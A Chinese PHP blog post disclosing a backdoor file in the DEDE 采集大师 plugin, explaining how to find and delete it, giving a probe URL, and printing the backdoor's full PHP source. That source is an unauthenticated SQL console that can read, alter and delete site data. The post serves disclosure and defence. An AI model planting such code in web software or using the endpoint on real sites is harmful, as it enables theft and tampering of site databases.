DEDE采集大师官方留后门的删除办法


Posted in PHP onJanuary 08, 2011

去除官方后门方法:安装好采集大师后,请立即删除 include目录下的dedesql.query.php文件,如已经安装过,有可能文件已被改名为arc.sqlquery.class.php,找到并删除即可。此文件可被利用来在无需登录验证的情况下查询网站数据库,并进行更新、删除、查询数据等操作。大家也可以自己测试一下是否如我所说,方法:
http://你的域名.com/include/dedesql.query.php.php?dopost=viewinfo
输入以上网址,即可打开后门界面。
说实话,会故意留后门的程序,最好的方法就是别用。这个后门被发现了,天知道下一个所谓的新版本还会不会冒出更多的后门来。此后门文件代码如下:

<?php 
require_once(dirname(__FILE__)."/../include/common.inc.php"); 
if(emptyempty($dopost)) 
{ 
$dopost = ""; 
} 
if($dopost=="rename") 
{ 
if(rename('dedesql.query.php','arc.sqlquery.class.php')){ 
echo "成功!"; 
}else{ 
echo "失败!"; 
} 
exit(); 
} 
if($dopost=="viewinfo") 
{ 
if(emptyempty($tablename)) 
{ 
echo "没有指定表名!"; 
} 
else 
{ 
$dsql->SetQuery("SHOW CREATE TABLE ".$dsql->dbName.".".$tablename); 
$dsql->Execute('me'); 
$row2 = $dsql->GetArray('me',MYSQL_BOTH); 
$ctinfo = $row2[1]; 
echo "<xmp>".trim($ctinfo)."</xmp>"; 
} 
exit(); 
} 
if($dopost=="index") 
{ 
require_once(DEDEINC.'/arc.partview.class.php'); 
$envs = $_sys_globals = array(); 
$envs['aid'] = 0; 
$pv = new PartView(); 
$row = $pv->dsql->GetOne('Select * From `#@__homepageset`'); 
$templet = str_replace("{style}",$cfg_df_style,$row['templet']); 
$homeFile = dirname(__FILE__).'/'.$row['position']; 
$homeFile = str_replace("//","/",str_replace("\\","/",$homeFile)); 
$fp = fopen($homeFile,'w') or die("无法更新网站主页到:$homeFile 位置"); 
fclose($fp); 
$tpl = $cfg_basedir.$cfg_templets_dir.'/'.$templet; 
$pv->SetTemplet($tpl); 
$pv->SaveToHtml($homeFile); 
$pv->Close(); 
echo "成功更新首页!"; 
exit(); 
} 
else if($dopost=="query") 
{ 
$sqlquery = trim(stripslashes($sqlquery)); 
if(eregi("drop(.*)table",$sqlquery) ||eregi("drop(.*)database",$sqlquery)) 
{ 
echo "<span style='font-size:10pt'>删除'数据表'或'数据库'的语句不允许在这里执行。</span>"; 
exit(); 
} 
if(eregi("^select ",$sqlquery)) 
{ 
$dsql->SetQuery($sqlquery); 
$dsql->Execute(); 
if($dsql->GetTotalRow()<=0) 
{ 
echo "运行SQL:{$sqlquery},无返回记录!"; 
} 
else 
{ 
echo "运行SQL:{$sqlquery},共有".$dsql->GetTotalRow()."条记录,最大返回100条!"; 
} 
$j = 0; 
while($row = $dsql->GetArray()) 
{ 
$j++; 
if($j>100) 
{ 
break; 
} 
echo "<hr size=1 width='100%'/>"; 
echo "记录:$j"; 
echo "<hr size=1 width='100%'/>"; 
foreach($row as $k=>$v) 
{ 
echo "<font color='red'>{$k}:</font>{$v}<br/>\r\n"; 
} 
} 
exit(); 
} 
if($querytype==2) 
{ 
$sqlquery = str_replace("\r","",$sqlquery); 
$sqls = split(";[ \t]{0,}\n",$sqlquery); 
$nerrCode = "";$i=0; 
foreach($sqls as $q) 
{ 
$q = trim($q); 
if($q=="") 
{ 
continue; 
} 
$dsql->ExecuteNoneQuery($q); 
$errCode = trim($dsql->GetError()); 
if($errCode=="") 
{ 
$i++; 
} 
else 
{ 
$nerrCode .= "执行: <font color='blue'>$q</font> 出错,错误提示:<font color='red'>".$errCode."</font><br>"; 
} 
} 
echo "成功执行{$i}个SQL语句!<br><br>"; 
echo $nerrCode; 
} 
else 
{ 
$dsql->ExecuteNoneQuery($sqlquery); 
$nerrCode = trim($dsql->GetError()); 
echo "成功执行1个SQL语句!<br><br>"; 
echo $nerrCode; 
} 
exit(); 
} 
if($dopost=="view") 
{ 
;echo '<html> 
<head> 
<meta http-equiv=\'Content-Type\' content=\'text/html; charset=gb2312\'> 
<title>SQL命令行工具</title> 
<link href=\'img/base.css\' rel=\'stylesheet\' type=\'text/css\'> 
</head> 
<body background=\'img/allbg.gif\' leftmargin=\'8\' topmargin=\'8\'> 
<table width="98%" border="0" align="center" cellpadding="3" cellspacing="1" bgcolor="#D1DDAA"> 
<tr> 
<td height="19" background="img/tbg.gif"> 
<table width="96%" border="0" cellspacing="1" cellpadding="1"> 
<tr> 
<td width="24%"><strong>SQL命令运行器:</strong></td> 
<td width="76%" align="right"> <b><a href="sys_data.php"><u>数据备份</u></a></b> 
| <b><a href="sys_data_revert.php"><strong><u>数据还原</u></strong></a></b> 
</td> 
</tr> 
</table> 
</td> 
</tr> 
<tr> 
<td height="200" bgcolor="#FFFFFF" valign="top"> 
<table width="100%" border="0" cellspacing="4" cellpadding="2"> 
<form action="" method="post" name="infoform" target="stafrm"> 
<input type=\'hidden\' name=\'dopost\' value=\'viewinfo\' /> 
<tr bgcolor="#F3FBEC"> 
<td width="15%" height="24" align="center">系统的表信息:</td> 
<td> 
<table width="100%" border="0" cellspacing="0" cellpadding="0"> 
<tr> 
<td width="35%"> 
<select name="tablename" id="tablename" style="width:100%" size="6"> 
'; 
$dsql->SetQuery("Show Tables"); 
$dsql->Execute('t'); 
while($row = $dsql->GetArray('t',MYSQL_BOTH)) 
{ 
$dsql->SetQuery("Select count(*) From ".$row[0]); 
$dsql->Execute('n'); 
$row2 = $dsql->GetArray('n',MYSQL_BOTH); 
$dd = $row2[0]; 
echo " <option value='".$row[0]."'>".$row[0]."(".$dd.")</option>\r\n"; 
} 
;echo ' </select> 
</td> 
<td width="2%"> </td> 
<td width="63%" valign="bottom"> 
<div style="float:left;margin-right:20px;"> 
<input type="Submit" name="Submit1" value="优化选中表" class="coolbg np" onClick="this.form.dopost.value=\'opimize\';" /> 
<br /> 
<input type="Submit" name="Submit2" value="修复选中表" class="coolbg np" onClick="this.form.dopost.value=\'repair\';" style="margin-top:6px;" /> 
<br /> 
<input type="Submit" name="Submit3" value="查看表结构" class="coolbg np" onClick="this.form.dopost.value=\'viewinfo\';" style="margin-top:6px;" /> 
</div> 
<div style="float:left"> 
<input type="Submit" name="Submit5" value="优化全部表" class="coolbg np" onClick="this.form.dopost.value=\'opimizeAll\';" /> 
<br /> 
<input type="Submit" name="Submit6" value="修复全部表" class="coolbg np" onClick="this.form.dopost.value=\'repairAll\';" style="margin-top:6px;" /> 
</div> 
</td> 
</tr> 
</table></td> 
</tr> 
<tr> 
<td height="200" align="center">返回信息:</td> 
<td> 
<iframe name="stafrm" frameborder="0" id="stafrm" width="100%" height="100%"></iframe> 
</td> 
</tr> 
</form> 
<form action="" method="post" name="form1" target="stafrm"> 
<input type=\'hidden\' name=\'dopost\' value=\'query\'> 
<tr> 
<td height="24" colspan="2" bgcolor="#F3FBEC"><strong>运行SQL命令行: 
<input name="querytype" type="radio" class="np" value="0"> 
单行命令(支持简单查询) 
<input name="querytype" type="radio" class="np" value="2" checked> 
多行命令</strong></td> 
</tr> 
<tr> 
<td height="118" colspan="2"> 
<textarea name="sqlquery" cols="60" rows="10" id="sqlquery" style="width:90%"></textarea> 
</td> 
</tr> 
<tr> 
<td height="53" align="center"> </td> 
<td> 
<input name="imageField" type="image" src="img/button_ok.gif" width="60" height="22" border="0" class=\'np\' /> 
</td> 
</tr> 
</form> 
</table> 
</td> 
</tr> 
</table> 
</body> 
</html> 
';} 
?>
PHP 相关文章推荐
提升PHP执行速度全攻略(下)
Oct 09 PHP
PHP中的正规表达式(一)
Oct 09 PHP
PHP5函数小全(分享)
Jun 06 PHP
PHP无限分类(树形类)
Sep 28 PHP
PHP使用mkdir创建多级目录的方法
Dec 22 PHP
PHP实现支付宝即时到账功能
Dec 21 PHP
PHP实现将优酷土豆腾讯视频html地址转换成flash swf地址的方法
Aug 04 PHP
windows环境下使用Composer安装ThinkPHP5
May 18 PHP
thinkPHP5框架自定义验证器实现方法分析
Jun 11 PHP
workerman结合laravel开发在线聊天应用的示例代码
Oct 30 PHP
php中pcntl_fork创建子进程的方法实例
Mar 14 PHP
Thinkphp集成抖音SDK的实现方法
Apr 28 PHP
php !function_exists(&quot;T7FC56270E7A70FA81A5935B72EACBE29&quot;))代码解密
Jan 07 #PHP
PHP备份/还原MySQL数据库的代码
Jan 06 #PHP
php循环检测目录是否存在并创建(循环创建目录)
Jan 06 #PHP
全局记录程序片段的运行时间 正确找到程序逻辑耗时多的断点
Jan 06 #PHP
Discuz Uchome ajaxpost小技巧
Jan 04 #PHP
php INI配置文件的解析实现分析
Jan 04 #PHP
PHP strncasecmp字符串比较的小技巧
Jan 04 #PHP
You might like
php读取30天之内的根据算法排序的代码
2008/04/06 PHP
joomla jce editor 解决上传中文名文件失败问题
2013/06/09 PHP
PHP实现今天是星期几的几种写法
2013/09/26 PHP
php微信公众开发之获取周边酒店信息的方法
2014/12/22 PHP
利用PHP将部分内容用星号替换
2020/04/21 PHP
Apache启动报错No space left on device: AH00023该怎么解决
2015/10/16 PHP
yii2实现根据时间搜索的方法
2016/05/25 PHP
使用PHP+MySql+Ajax+jQuery实现省市区三级联动功能示例
2017/09/15 PHP
Nigma vs Alliance BO5 第五场2.14
2021/03/10 DOTA
用js遍历 table的脚本
2008/07/23 Javascript
基于jquery的一个拖拽到指定区域内的效果
2011/09/21 Javascript
jQuery实现向下滑出的平滑下拉菜单效果
2015/08/21 Javascript
js数组去重的5种算法实现
2015/11/04 Javascript
js基于setTimeout与setInterval实现多线程
2016/06/17 Javascript
AngularJS 模块详解及简单实例
2016/07/28 Javascript
js事件冒泡、事件捕获和阻止默认事件详解
2016/08/04 Javascript
jQuery中get方法用法分析
2016/12/07 Javascript
jQuery Validate验证表单时多个name相同的元素只验证第一个的解决方法
2016/12/24 Javascript
AngularJS表格添加序号的方法
2017/03/03 Javascript
详解Angular 4 表单快速入门
2017/06/05 Javascript
JavaScript正则表达式简单实用实例
2017/06/23 Javascript
vue 判断两个时间插件结束时间必选大于开始时间的代码
2020/11/04 Javascript
[49:27]2018DOTA2亚洲邀请赛 4.4 淘汰赛 TNC vs VG 第一场
2018/04/05 DOTA
[47:50]Secret vs VP 2018国际邀请赛小组赛BO2 第二场 8.17
2018/08/20 DOTA
Python学习笔记整理3之输入输出、python eval函数
2015/12/14 Python
Python Django 前后端分离 API的方法
2019/08/28 Python
pyCharm 实现关闭代码检查
2020/06/09 Python
python 利用matplotlib在3D空间中绘制平面的案例
2021/02/06 Python
GUESS德国官网:美国牛仔服装品牌
2017/02/14 全球购物
总经理助理岗位职责
2013/11/08 职场文书
大一自我鉴定范文
2013/12/27 职场文书
我有一个梦想演讲稿
2014/05/05 职场文书
房地产开发项目建议书
2014/05/16 职场文书
高中班主任工作总结(范文)
2019/08/20 职场文书
总结Python变量的相关知识
2021/06/28 Python
apache ftpserver搭建ftp服务器
2022/05/20 Servers